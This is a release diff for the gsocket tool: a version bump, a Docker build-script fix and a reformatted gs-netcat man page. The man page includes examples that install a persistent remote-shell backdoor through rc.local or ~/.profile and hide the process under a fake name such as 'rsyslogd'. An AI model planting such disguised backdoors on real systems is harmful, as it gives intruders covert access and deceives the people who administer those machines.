1.4.36

configure.ac

@@ -1,6 +1,6 @@
 dnl Process this File with autoconf to produce a configure script.
 AC_PREREQ([2.69])
-AC_INIT([gsocket],[1.4.36-dev])
+AC_INIT([gsocket],[1.4.36])
 AC_CONFIG_AUX_DIR(config)
 AC_CANONICAL_TARGET
 

packaging/debian-deb/build_all.sh

@@ -14,5 +14,5 @@ fi
 [[ -d "$SRCDIR" ]] || { echo >&2 "Source not found: $SRCDIR or ${tar_orig}."; exit 255; }
 
 dockername="gs-x86_64-debian-devel"
-docker run --rm -it "${dockername}" true || docker build -t "${dockername}" . || { exit 255; }
+docker run --rm -it "${dockername}" true || (cd "${DEBDIR}" && docker build -t "${dockername}" . ) || { exit 255; }
 docker run --rm  -v "${PKGDIR}:/gsocket-pkg" -v "${SRCDIR}:/gsocket-src" -v "${DEBDIR}:/gsocket-deb" -e VER=$VER -it "${dockername}" /gsocket-deb/build.sh || { exit 255; }

tools/man_gs-netcat.h

@@ -1,56 +1,53 @@
 const char *man_str = "\
-\n\
-GS-NETCAT(1)		  BSD General Commands Manual		  GS-NETCAT(1)\n\
+GS-NETCAT(1)		     General Commands Manual		    GS-NETCAT(1)\n\
 \n\
 NAME\n\
-     gs-netcat -- transfer data, forward traffic and execute commands on a\n\
-     remote host. Securely.\n\
+     gs-netcat – transfer data, forward traffic and execute commands on a remote\n\
+     host. Securely.\n\
 \n\
 SYNOPSIS\n\
      gs-netcat [-rlgvqwCTSDiu] [-s secret] [-k keyfile] [-L logfile] [-d IP]\n\
 	       [-p port] [-e cmd]\n\
 \n\
 DESCRIPTION\n\
      The gs-netcat utility is a re-implementation of netcat. It allows two or\n\
-     more users to establish a secure TCP connection with each other in a sce-\n\
-     nario where all users are behind NAT/Firewall and would not be able to\n\
-     connect to each other directly. Typically a connection between one work-\n\
-     station and another workstation on a different Local Area Network.\n\
+     more users to establish a secure TCP connection with each other in a\n\
+     scenario where all users are behind NAT/Firewall and would not be able to\n\
+     connect to each other directly. Typically a connection between one\n\
+     workstation and another workstation on a different Local Area Network.\n\
 \n\
-     It uses the Global Socket Relay Network (GSRN) instead of direct TCP con-\n\
-     nections. Neither workstation needs to open a port in their firewall or\n\
+     It uses the Global Socket Relay Network (GSRN) instead of direct TCP\n\
+     connections. Neither workstation needs to open a port in their firewall or\n\
      accept incoming TCP connections.\n\
 \n\
-     The connection is end-2-end encrypted using SRP (RFC 5054) with AES-256\n\
-     and a 4096 Prime. The GSRN sees only the encrypted traffic.\n\
+     The connection is end-2-end encrypted using SRP (RFC 5054) with AES-256 and\n\
+     a 4096 Prime. The GSRN sees only the encrypted traffic.\n\
 \n\
      Common uses include:\n\
 \n\
-	   o   simple TCP proxies\n\
-	   o   PTY shell\n\
-	   o   File transfer\n\
-	   o   a SOCKS ProxyCommand for ssh(1)\n\
-	   o   and much, much more.\n\
+	   •   simple TCP proxies\n\
+	   •   PTY shell\n\
+	   •   File transfer\n\
+	   •   a SOCKS ProxyCommand for ssh(1)\n\
+	   •   and much, much more.\n\
 \n\
 OPTIONS\n\
      -C      Disable encryption and use clear-text instead. Use with caution.\n\
 \n\
      -d ip   Destination IPv4 address for port forwarding.\n\
 \n\
-     -D      Daemon & Watchdog mode. Start gs-netcat as a background process\n\
-	     and restart if killed.\n\
+     -D      Daemon & Watchdog mode. Start gs-netcat as a background process and\n\
+	     restart if killed.\n\
 \n\
-     -e cmd  Execute command and send output to the connected client. Needs\n\
-	     -l.\n\
+     -e cmd  Execute command and send output to the connected client. Needs -l.\n\
 \n\
-     -g      Generate a secure random password and output it to standard out-\n\
-	     put.\n\
+     -g      Generate a secure random password and output it to standard output.\n\
 \n\
-     -i      Interactive login shell. The server spawns a true PTY login\n\
-	     shell. The client acts as a true PTY client (with Ctrl-C etc\n\
-	     working). The client can terminate the session by typing 'Ctrl-e\n\
-	     q' at any time or by typing 'exit'. The server supports multiple\n\
-	     clients at the same time.\n\
+     -i      Interactive login shell. The server spawns a true PTY login shell.\n\
+	     The client acts as a true PTY client (with Ctrl-C etc working). The\n\
+	     client can terminate the session by typing 'Ctrl-e q' at any time\n\
+	     or by typing 'exit'. The server supports multiple clients at the\n\
+	     same time.\n\
 \n\
      -k file\n\
 	     A file containing the password.\n\
@@ -65,8 +62,8 @@ OPTIONS\n\
 \n\
      -q      Quiet mode. Do not output any warnings or errors.\n\
 \n\
-     -r      Receive-only. Do not send any data. Terminate when no more data\n\
-	     is available for reading.\n\
+     -r      Receive-only. Do not send any data. Terminate when no more data is\n\
+	     available for reading.\n\
 \n\
      -s secret\n\
 	     A password chosen by the user. Both users need to use the same\n\
@@ -76,9 +73,9 @@ OPTIONS\n\
 	     proxy. It allows multiple gs-netcat clients to (securely) relay\n\
 	     traffic via the server. Needs -l.\n\
 \n\
-     -T      Use TOR. The gs-netcat tool will connect via TOR to the GSRN.\n\
-	     This requires TOR to be installed and running. The IP and PORT of\n\
-	     the TOR server can be set using environment variables.\n\
+     -T      Use TOR. The gs-netcat tool will connect via TOR to the GSRN. This\n\
+	     requires TOR to be installed and running. The IP and PORT of the\n\
+	     TOR server can be set using environment variables.\n\
 \n\
      -u      Use UDP instead of TCP for port forwarding. Needs -p.\n\
 \n\
@@ -88,41 +85,41 @@ OPTIONS\n\
      -w      Client to wait for the listening server to become available.\n\
 \n\
 CONSOLE\n\
-     The interactive login shell ( -i ) has a command console. Pressing 'Ctrl-\n\
-     e c' (e for EEEElite) opens the command console. The command console dis-\n\
-     plays the following information:\n\
-\n\
-	   o   Latency (in milliseconds) to the remote host\n\
-	   o   Warning when a user logs into the system or becomes active\n\
-	   o   Data throughput\n\
-	   o   File transfer logs\n\
+     The interactive login shell ( -i ) has a command console. Pressing 'Ctrl-e\n\
+     c' (e for EEEElite) opens the command console. The command console displays\n\
+     the following information:\n\
+\n\
+	   •   Latency (in milliseconds) to the remote host\n\
+	   •   Warning when a user logs into the system or becomes active\n\
+	   •   Data throughput\n\
+	   •   File transfer logs\n\
      Type 'help' for a list of available commands.\n\
 \n\
 FILETRANSFER\n\
-     File transfer is available from the command console. Files are trans-\n\
-     ferred with the permission and modification timestamp unchanged. Par-\n\
-     tially transferred files are re-started where the transfer was left off.\n\
-     The 'put' command is used for uploading:\n\
+     File transfer is available from the command console. Files are transferred\n\
+     with the permission and modification timestamp unchanged. Partially\n\
+     transferred files are re-started where the transfer was left off.	The\n\
+     'put' command is used for uploading:\n\
 	   put foobar.txt\n\
 	   put $HOME/foobar.txt\n\
 	   put /tmp/*.log\n\
 	   put $(find. -type f -name '*.c')\n\
-     (The above example shows Shell Variable substitution and word expansion)\n\
-     It is possible to limit the amount of path information that is sent as\n\
-     implied directories for each path you specify. You can insert a dot and a\n\
-     slash into the source path, like this:\n\
+     (The above example shows Shell Variable substitution and word expansion) It\n\
+     is possible to limit the amount of path information that is sent as implied\n\
+     directories for each path you specify. You can insert a dot and a slash\n\
+     into the source path, like this:\n\
 	   put /foo/./bar/baz.c\n\
-     That would create /tmp/bar/baz.c on the remote machine.  The 'get' com-\n\
-     mand is used for downloading:\n\
+     That would create /tmp/bar/baz.c on the remote machine.  The 'get' command\n\
+     is used for downloading:\n\
 	   get foobar.txt\n\
 	   get $(find /var/./ -name '*.log')\n\
-     Transferring a directory automatically transfers all files and directo-\n\
-     ries within that directory (recursively):\n\
+     Transferring a directory automatically transfers all files and directories\n\
+     within that directory (recursively):\n\
 	   get /var/log\n\
 	   get /\n\
      The first command transfers all directories and files in /var/log/*. The\n\
-     latter command transfers the entire filesystem.  Multiple get/put com-\n\
-     mands can be scheduled at the same time.\n\
+     latter command transfers the entire filesystem.  Multiple get/put commands\n\
+     can be scheduled at the same time.\n\
 \n\
 EXAMPLES\n\
      Example 1 - Listen for a new connection using the password 'MySecret':\n\
@@ -159,8 +156,8 @@ EXAMPLES\n\
      Example 6 - TCP Port Forward all connections to 192.168.6.7:22. Server:\n\
 	   $ gs-netcat -s MySecret -l -d 192.168.6.7 -p 22\n\
 \n\
-     Client to listen on TCP port 2222 and forward any new connection to the\n\
-     the server. The server then forwards the connection to 192.168.6.7:22.\n\
+     Client to listen on TCP port 2222 and forward any new connection to the the\n\
+     server. The server then forwards the connection to 192.168.6.7:22.\n\
 	   $ gs-netcat -s MySecret -p 2222\n\
 	   $ ssh -p 2222 [email protected]\n\
 \n\
@@ -172,8 +169,8 @@ EXAMPLES\n\
 \n\
      The sftp-server binary speaks the sftp-protocol to stdin/stdout. The sftp\n\
      binary also speaks sftp-protocol to stdin/stdout. The tool can be used to\n\
-     connect both via GSRN (encrypted) and access the SFTP server running on\n\
-     the server's side from the client via the GSRN (encrypted).:\n\
+     connect both via GSRN (encrypted) and access the SFTP server running on the\n\
+     server's side from the client via the GSRN (encrypted).:\n\
 	   $ export GSOCKET_ARGS='-s MySecret'\n\
 	   $ sftp -D gs-netcat\n\
 \n\
@@ -187,13 +184,12 @@ EXAMPLES\n\
 	   SHELL=\"/bin/bash\" /bin/bash -c \"cd $HOME; exec -a rsyslogd\n\
 	   /usr/local/bin/gs-netcat\"\n\
 \n\
-     The following line in /etc/rc.local starts a port-forward to\n\
-     127.0.0.1:22:\n\
-	   GSOCKET_ARGS=\"-k MySecret2 -lqD -d 127.1 -p22\" /bin/bash -c \"exec\n\
-	   -a rsyslogd /usr/local/bin/gs-netcat\"\n\
+     The following line in /etc/rc.local starts a port-forward to 127.0.0.1:22:\n\
+	   GSOCKET_ARGS=\"-k MySecret2 -lqD -d 127.1 -p22\" /bin/bash -c \"exec -a\n\
+	   rsyslogd /usr/local/bin/gs-netcat\"\n\
 \n\
-     The following line in the user's ~/.profile starts the backdoor (once)\n\
-     when the user logs in. All in one line:\n\
+     The following line in the user's ~/.profile starts the backdoor (once) when\n\
+     the user logs in. All in one line:\n\
 	   killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s MySecret3\n\
 	   -liqD\" SHELL=/bin/bash exec -a -bash /usr/local/bin/gs-netcat)\n\
 \n\
@@ -209,8 +205,8 @@ ENVIRONMENT\n\
      gs-netcat\n\
 \n\
      GSOCKET_SOCKS_IP\n\
-	   Specify the IP address of the TOR server (or any other SOCKS\n\
-	   server). Default is 127.0.0.1.\n\
+	   Specify the IP address of the TOR server (or any other SOCKS server).\n\
+	   Default is 127.0.0.1.\n\
 \n\
      GSOCKET_SOCKS_PORT\n\
 	   The port number of the TOR server (or any other SOCKS server).\n\
@@ -230,42 +226,41 @@ SECURITY\n\
 	   $ export GSOCKET_ARGS=\"-s MySecret\"\n\
 	   $ gs-netcat\n\
 \n\
-     1. The security is end-2-end. This means from User-2-User (and not just\n\
-     to the GSRN). The GSRN relays only (encrypted) data to and from the\n\
-     users.\n\
+     1. The security is end-2-end. This means from User-2-User (and not just to\n\
+     the GSRN). The GSRN relays only (encrypted) data to and from the users.\n\
 \n\
-     2. The session is 256 bit and ephemeral. It is freshly generated for\n\
-     every session and generated randomly (and is not based on the password).\n\
-     It uses OpenSSL's SRP with AES-256 and a 4096 Prime.\n\
+     2. The session is 256 bit and ephemeral. It is freshly generated for every\n\
+     session and generated randomly (and is not based on the password). It uses\n\
+     OpenSSL's SRP with AES-256 and a 4096 Prime.\n\
 \n\
-     3. The password can be 'weak' without weakening the security of the ses-\n\
-     sion. A brute force attack against a weak password requires a new TCP\n\
+     3. The password can be 'weak' without weakening the security of the\n\
+     session. A brute force attack against a weak password requires a new TCP\n\
      connection for every guess.\n\
 \n\
      4. Do not use stupid passwords like 'password123'. Malice might pick the\n\
-     same (stupid) password by chance and connect. If in doubt use gs-netcat\n\
-     -g to generate a strong one. Alice's and Bob's password should at least\n\
-     be strong enough so that Malice can not guess it by chance while Alice is\n\
+     same (stupid) password by chance and connect. If in doubt use gs-netcat -g\n\
+     to generate a strong one. Alice's and Bob's password should at least be\n\
+     strong enough so that Malice can not guess it by chance while Alice is\n\
      waiting for Bob to connect.\n\
 \n\
-     5. If Alice shares the same password with Bob and Charlie and either one\n\
-     of them connects then Alice can not tell if it is Bob or Charlie who con-\n\
-     nected.\n\
+     5. If Alice shares the same password with Bob and Charlie and either one of\n\
+     them connects then Alice can not tell if it is Bob or Charlie who\n\
+     connected.\n\
 \n\
      6. Assume Alice shares the same password with Bob and Malice. When Alice\n\
-     stops listening for a connection then Malice could start to listen for\n\
-     the connection instead. Bob (when opening a new connection) can not tell\n\
-     if he is connecting to Alice or to Malice. Use -a <token> if you worry\n\
-     about this. TL;DR: When sharing the same password with a group larger\n\
-     than 2 then it is assumed that everyone in that group plays nicely. Oth-\n\
-     erwise use SSH over the GS/TLS connection.\n\
+     stops listening for a connection then Malice could start to listen for the\n\
+     connection instead. Bob (when opening a new connection) can not tell if he\n\
+     is connecting to Alice or to Malice. Use -a <token> if you worry about\n\
+     this. TL;DR: When sharing the same password with a group larger than 2 then\n\
+     it is assumed that everyone in that group plays nicely. Otherwise use SSH\n\
+     over the GS/TLS connection.\n\
 \n\
      7. SRP has Perfect Forward Secrecy. This means that past sessions can not\n\
      be decrypted even if the password becomes known.\n\
 \n\
 NOTES\n\
-     The latest version is available from https://github.com/hacker-\n\
-     schoice/gsocket/.\n\
+     The latest version is available from\n\
+     https://github.com/hackerschoice/gsocket/.\n\
 \n\
 SEE ALSO\n\
      gsocket(1), gs-sftp(1), gs-mount(1), blitz(1), nc(1), socat(1)\n\
@@ -276,5 +271,5 @@ BUGS\n\
      whatever circumstances, please notify me ([email protected]) and tell me how\n\
      you think it should behave.\n\
 \n\
-BSD			       October 08, 2020 			   BSD\n\
+macOS 12.4			 October 8, 2020		      macOS 12.4\n\
 ";